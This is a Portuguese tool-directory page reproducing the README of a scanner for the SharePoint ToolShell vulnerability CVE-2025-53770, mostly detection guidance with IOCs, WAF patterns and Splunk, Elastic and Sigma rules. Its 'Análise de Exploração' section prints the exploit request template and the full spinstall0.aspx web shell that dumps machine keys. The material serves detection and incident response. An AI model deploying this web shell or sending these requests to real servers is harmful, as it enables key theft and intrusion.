Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-53770-Scanner — ToolShell scanner - CVE-2025-53770 e informações de detecção | Kitploit
Ferramentas/GitHubGitHub/zephrfish/cve-2025-53770-scanner
Ferramentas DefensivasGerenciamento de Indicadores de Comprometimento (IOC)Scanners de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoInteligência de AmeaçasResposta a IncidentesAnálise de Logs
GitHubzephrfish/cve-2025-53770-scanner

CVE-2025-53770-Scanner

ToolShell scanner - CVE-2025-53770 e informações de detecção

1855há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
Compartilhar

CVE-2025-53770 Scanner de Vulnerabilidades do SharePoint

100% montado às pressas com todos os tweets que circulam com payloads e diferentes ataques, portanto, vem sem qualquer garantia, etc. O scanner foi projetado para identificar instâncias vulneráveis e possui uma configuração com usos de exploração conhecidos em ambientes reais; é projetado principalmente para uso defensivo, para identificar instâncias vulneráveis e permitir que você aplique as correções.

Este scanner realiza verificações automatizadas em implantações do SharePoint:

  • Enviando requisições POST elaboradas para endpoints do ToolPane do SharePoint com payloads de exploração
  • Detectando tentativas de extração de machine key e exploração bem-sucedida
  • Identificando a implantação de payload secundário (spinstall0.aspx)
  • Analisando respostas em busca de indicadores de vulnerabilidade com base em padrões de ataque observados
  • Fornecendo relatórios detalhados com níveis de confiança e alertas de ação imediata
  • Suportando varredura concorrente para eficiência

Principais Capacidades de Detecção

CRÍTICO: Detecção de Extração de Machine Key

  • Detecta respostas bem-sucedidas de extração de machine key
  • Identifica exposição de ValidationKey, DecryptionKey e CompatibilityMode
  • Reconhece padrões de machine key delimitados por pipe (ValidationKey|Validation|DecryptionKey|Decryption|CompatibilityMode)
  • Aciona alertas de ação imediata para sistemas comprometidos

Detecção de Payload Secundário

  • Identifica tentativas de implantação do spinstall0.aspx
  • Detecta padrões de código de payload em C# ASP.NET
  • Reconhece o uso de System.Web.Configuration.MachineKeySection
  • Detecção de caminho específica por versão (SP2013: WEBSER~1\15\ vs SP2016+: WEBSER~1\16\)

Instalação

  1. Clone o repositório:
root@kitploit:~
git clone https://github.com/ZephrFish/CVE-2025-53770-Scanner
cd CVE-2025-53770-Scanner
  1. Instale as dependências:
root@kitploit:~
pip install -r requirements.txt

Uso

Uso Básico

Crie um arquivo de texto com os hosts alvo (um por linha):

root@kitploit:~
sharepoint1.example.com
sharepoint2.example.net
internal-sp.company.local

Execute o scanner:

root@kitploit:~
python3 scanner.py -i hosts.txt

python3 scanner.py -i hosts.txt -o results.json -l scan.log -t 20 -v

Opções de Linha de Comando

OpçãoDescriçãoPadrão
-i, --inputCaminho para o arquivo de lista de hosts (obrigatório)-
-o, --outputArquivo de saída para os resultados (.json, .csv, .txt)Nenhum
-l, --logfileCaminho do arquivo de log para registro detalhadoNenhum
-t, --threadsNúmero de threads concorrentes10
-v, --verboseHabilita saída e registro detalhadosFalso

Formatos de Saída

Saída JSON (-o results.json)

root@kitploit:~
[
  {
    "host": "sharepoint.example.com",
    "url": "https://sharepoint.example.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx",
    "scan_time": "2025-07-21T10:30:00.123456",
    "vulnerable": true,
    "status_code": 200,
    "response_size": 15432,
    "error": null,
    "response_time": 1.23
  }
]

Saída CSV (-o results.csv)

Fornece dados tabulares adequados para análise em planilhas, com colunas para todas as métricas da varredura.

Saída de Texto (-o results.txt)

Formato legível por humanos com status de vulnerabilidade e detalhes da varredura.

Detalhes da Vulnerabilidade

CVE-2025-53770 tem como alvo uma vulnerabilidade de desserialização no componente ExcelDataSet do SharePoint que tem sido ativamente explorada em ambientes reais. O scanner detecta:

Padrões de Ataque Identificados

  1. Exploração Inicial: Requisição POST para /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx com payload serializado
  2. Extração de Machine Key: Exploração bem-sucedida retorna a configuração de machine key delimitada por pipe:
    root@kitploit:~
    ValidationKey|Validation|DecryptionKey|Decryption|CompatibilityMode
    Example: [128-256 hex chars]|HMACSHA256|[48-96 hex chars]|AES|Framework45
    
  3. Payload Secundário: Implantação do spinstall0.aspx para acesso persistente e extração de chaves
  4. Segmentação por Versão: Caminhos diferentes para versões do SharePoint (layouts 15/ vs 16/)

IOCs Confirmados de Exploração Ativa

  • User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
  • Referer: /_layouts/SignOut.aspx
  • Content-Length: Normalmente 7699-8000+ bytes
  • Tamanho do Payload: Parâmetros CompressedDataTable grandes codificados em base64
  • Indicadores de Resposta: Strings de machine key, implantação do spinstall0.aspx
  • Infraestrutura de Ataque: 65.38.121.198, 162.243.204.189, 165.22.18.129

Lógica de Detecção

O scanner analisa as respostas em busca de:

  1. Padrões de extração de machine key (confiança CRÍTICA)
  2. Indicadores de payload secundário (confiança ALTA)
  3. Processamento de componentes ExcelDataSet/Scorecard (confiança MÉDIA)
  4. Padrões de erro do ToolPane e características anômalas de resposta (confiança BAIXA)

Considerações de Segurança

  • Esta ferramenta foi projetada apenas para testes de segurança autorizados
  • Garanta a devida autorização antes de escanear qualquer sistema
  • O scanner usa HTTPS por padrão, mas aceita certificados autoassinados
  • Os logs podem conter informações sensíveis — proteja-os adequadamente
  • Considere o impacto na rede ao usar números elevados de threads

Exemplo de Sessão de Varredura

root@kitploit:~
$ python3 scanner.py -i corporate-sharepoint.txt -o vuln-results.json -l scan.log -v

Starting scan of 150 hosts with 10 threads...
Target CVE: CVE-2025-53770 (SharePoint ExcelDataSet deserialization)
Logging to: scan.log
Results will be saved to: vuln-results.json

[+] VULNERABLE [CRITICAL]: sp-prod-01.acme.local
[-] Not vulnerable: sp-dev-02.acme.local  
[!] ERROR: offline-sp.acme.local - Connection timeout
[+] VULNERABLE [HIGH]: sp-legacy.acme.local
Progress: 50/150 (33.3%)
Progress: 100/150 (66.7%)
Progress: 150/150 (100.0%)

============================================================
SCAN COMPLETE
============================================================
Total hosts scanned: 150
Vulnerable hosts: 3
Success rate: 97.3%

VULNERABLE HOSTS (CVE-2025-53770):

  CRITICAL - MACHINE KEY EXTRACTED (1 hosts):
    • sp-prod-01.acme.local (Response time: 0.85s, Version: 2016+)
      WARNING: IMMEDIATE ACTION REQUIRED: Machine keys compromised

  HIGH CONFIDENCE (1 hosts):
    • sp-legacy.acme.local (Response time: 1.23s, Version: 2013-2016)

  LOW CONFIDENCE (1 hosts):
    • sp-archive.acme.local (Response time: 2.10s, Version: Unknown)

Detailed results saved to: vuln-results.json

Solução de Problemas

Problemas Comuns

  1. Timeouts de Conexão: Aumente o timeout ou reduza o número de threads
  2. Erros de SSL: O scanner desativa os avisos de SSL por padrão
  3. Erros de Permissão: Garanta acesso de gravação para os arquivos de saída/log
  4. Uso de Memória: Monitore ao usar listas grandes de hosts

Análise de Logs

Habilite o registro detalhado (-v) e arquivos de log (-l) para uma solução de problemas detalhada:

root@kitploit:~
tail -f scan.log

Análise de Exploração

Payloads de Ataque Observados

O scanner incorpora detecção para padrões de exploração confirmados observados em ataques ativos:

Estrutura do Payload Primário

root@kitploit:~
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: target.domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 7699
Content-Type: application/x-www-form-urlencoded
Referer: /_layouts/SignOut.aspx
Connection: close

MSOTlPn_Uri=http%3A%2F%2F{{host}}%2F_controltemplates%2F15%2FAclEditor.ascx
&MSOTlPn_DWP=[ExcelDataSet payload with CompressedDataTable containing serialized exploit]

Payload Secundário (spinstall0.aspx)

root@kitploit:~
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script runat="server" language="c#" CODEPAGE="65001">
    public void Page_load()
    {
        var sy = System.Reflection.Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
        var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
        var gac = mkt.GetMethod("GetApplicationConfig", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);
        var cg = (System.Web.Configuration.MachineKeySection)gac.Invoke(null, new object[0]);
        Response.Write(cg.ValidationKey+"|"+cg.Validation+"|"+cg.DecryptionKey+"|"+cg.Decryption+"|"+cg.CompatibilityMode);
    }
</script>

Formato Esperado da Resposta de Machine Key

root@kitploit:~
ValidationKey: [128-256 character hex string]
Validation: HMACSHA256|HMACSHA1|SHA1
DecryptionKey: [48-96 character hex string] 
Decryption: AES|DES|3DES
CompatibilityMode: Framework20SP1|Framework45|Framework40

Orientações de Detecção e Monitoramento

Detectando Tentativas de Exploração do CVE-2025-53770

As organizações devem implementar os seguintes mecanismos de detecção para identificar possíveis tentativas de exploração:

1. Regras de Firewall de Aplicação Web (WAF)

Monitore requisições POST suspeitas para endpoints do ToolPane do SharePoint:

root@kitploit:~
# Example WAF detection rule patterns
POST /_layouts/15/ToolPane.aspx*
POST /_layouts/*/ToolPane.aspx*
Query string: "DisplayMode=Edit&a=/ToolPane.aspx"
Request body containing: "MSOTlPn_Uri", "MSOTlPn_DWP"
Request body containing: "ExcelDataSet", "CompressedDataTable"
Request body containing: "Scorecard:ExcelDataSet"
Request body containing: "H4sIAAAAAAAEA" (gzip magic bytes in base64)
Content-Length > 5000 bytes (typical payload size)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0)
Referer: /_layouts/SignOut.aspx

padrões de exploração observados:

  • Tamanhos de payload normalmente 7000-8000+ bytes
  • Dados compactados codificados em URL no parâmetro CompressedDataTable
  • String de User-Agent específica: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0)
  • Content-Type: application/x-www-form-urlencoded
  • Cabeçalho Connection: close frequentemente presente
  • Objetos .NET serializados codificados em base64 no payload
  • A resposta contém machine keys no formato delimitado por pipe
  • Requisições secundárias para arquivos spinstall0.aspx implantados

2. Logs ULS do SharePoint

Monitore os logs do SharePoint Unified Logging Service (ULS) em busca de:

root@kitploit:~
Category: SharePoint Foundation Web Controls
Level: Unexpected, Error, Critical
Keywords: "ToolPane", "ExcelDataSet", "Deserialization"
Process: w3wp.exe

Principais indicadores nos logs ULS:

  • Exceções inesperadas no processamento do ToolPane.aspx
  • Erros de desserialização em componentes Microsoft.PerformancePoint
  • Corrupção de memória ou falhas de processo no w3wp.exe

3. Logs de Acesso do IIS

Monitore os logs do IIS em busca de padrões de exploração:

root@kitploit:~
# Log analysis queries (replace with your SIEM syntax)
cs-method="POST" AND cs-uri-stem="/_layouts/15/ToolPane.aspx"
cs-method="POST" AND cs-uri-query="DisplayMode=Edit&a=/ToolPane.aspx"
cs-bytes > 7000 (typical exploit payload size)
cs(User-Agent)="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
cs(Referer)="/_layouts/SignOut.aspx"
sc-status=200 AND time-taken > 5000 (slow processing indicating deserialization)

IOCs específicos de ataques reais:

root@kitploit:~
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx
Content-Length: 7699
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Referer: /_layouts/SignOut.aspx
Body contains: MSOTlPn_Uri=http%3A%2F%2F[domain]%2F_controltemplates%2F15%2FAclEditor.ascx
Body contains: CompressedDataTable%3D%22H4sIAAAAAAAEANVa23LbSJLt3stEzMzu0%2F6AQs%2B2BJCiu%2BWQ

4. Análise de Tráfego de Rede

Monitore o tráfego de rede em busca de:

  • Tamanhos incomuns de requisições POST para servidores SharePoint
  • Requisições repetidas ao ToolPane.aspx a partir de fontes únicas
  • Payloads codificados em base64 em corpos de POST HTTP
  • Strings de User-Agent de não navegadores direcionadas ao SharePoint

5. Logs de Eventos do Windows

Monitore os Logs de Eventos do Windows nos servidores SharePoint:

root@kitploit:~
Event Log: Application
Source: ASP.NET, SharePoint Foundation
Event IDs: 1309, 1310 (application errors)
Event Log: System
Source: Application Error
Process: w3wp.exe crashes

6. Regras de Detecção em SIEM

Consulta de Detecção no Splunk:
root@kitploit:~
index=iis source="*iis*" 
| search cs_method="POST" cs_uri_stem="/_layouts/15/ToolPane.aspx" cs_uri_query="DisplayMode=Edit&a=/ToolPane.aspx"
| eval payload_size=tonumber(cs_bytes)
| where payload_size > 7000
| search cs_User_Agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
| stats count by src_ip, cs_uri_stem, payload_size
| sort -payload_size
Detecção Aprimorada para Ataques Reais:
root@kitploit:~
index=iis 
| search cs_method="POST" AND cs_uri_stem="/_layouts/15/ToolPane.aspx"
| where cs_bytes > 7000 AND cs_bytes < 10000
| search cs_Referer="/_layouts/SignOut.aspx"
| eval attack_pattern=if(like(cs_User_Agent, "%Windows NT 10.0; Win64; x64; rv:120.0%"), "CVE-2025-53770", "Other")
| where attack_pattern="CVE-2025-53770"
| table _time, src_ip, cs_uri_query, cs_bytes, sc_status
Consulta no Elastic/Kibana:
root@kitploit:~
{
  "query": {
    "bool": {
      "must": [
        {"term": {"http.request.method": "POST"}},
        {"term": {"url.path": "/_layouts/15/ToolPane.aspx"}},
        {"term": {"url.query": "DisplayMode=Edit&a=/ToolPane.aspx"}},
        {"range": {"http.request.bytes": {"gte": 7000, "lte": 10000}}},
        {"term": {"user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"}},
        {"term": {"http.request.referrer": "/_layouts/SignOut.aspx"}}
      ]
    }
  }
}
Regra Sigma para CVE-2025-53770:
root@kitploit:~
title: CVE-2025-53770 SharePoint ExcelDataSet Exploitation
id: cve-2025-53770-sharepoint-exploit
description: Detects exploitation attempts of CVE-2025-53770 SharePoint deserialization vulnerability
references:
    - https://github.com/your-repo/CVE-2025-53770-Scanner
author: Security Team
date: 2025/07/21
logsource:
    category: webserver
    product: iis
detection:
    selection:
        cs-method: 'POST'
        cs-uri-stem: '/_layouts/15/ToolPane.aspx'
        cs-uri-query: 'DisplayMode=Edit&a=/ToolPane.aspx'
        cs-bytes: 
            - gte: 7000
            - lte: 10000
        cs-User-Agent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0'
        cs-Referer: '/_layouts/SignOut.aspx'
    condition: selection
falsepositives:
    - Legitimate SharePoint administrative activities
level: high
tags:
    - attack.initial_access
    - attack.t1190
    - cve.2025.53770

7. Indicadores Comportamentais

Fique atento a estes comportamentos pós-exploração:

  • Conexões de rede de saída incomuns a partir de servidores SharePoint
  • Novas contas de usuário criadas no SharePoint ou no Active Directory
  • Uploads ou modificações de arquivos não autorizados
  • Tentativas de elevação de privilégio
  • Movimento lateral para outros sistemas

Ações de Resposta Recomendadas

  1. Resposta Imediata:

    • Bloqueie IPs de origem suspeitos no firewall/WAF
    • Isole os servidores SharePoint afetados se a exploração for confirmada
    • Preserve logs e despejos de memória para análise forense
  2. Investigação:

    • Analise os payloads das requisições POST em busca de conteúdo malicioso
    • Verifique indicadores de execução de código bem-sucedida
    • Revise as atividades das contas de usuário e alterações de permissões
    • Correlacione com outros eventos de segurança
  3. Contenção:

    • Aplique patches de segurança imediatamente
    • Implemente regras de WAF para bloquear tentativas de exploração
    • Segmente os servidores SharePoint dos recursos críticos de rede

Exemplos de Integração com SIEM

Importando Resultados de Varredura no Splunk:

root@kitploit:~
# Convert scan results for Splunk ingestion
python3 scanner.py -i hosts.txt -o results.json
# Import into Splunk index
curl -k -H "Authorization: Splunk <token>" -X POST \
  "https://splunk-server:8088/services/collector" \
  -d @results.json
Baixar ferramenta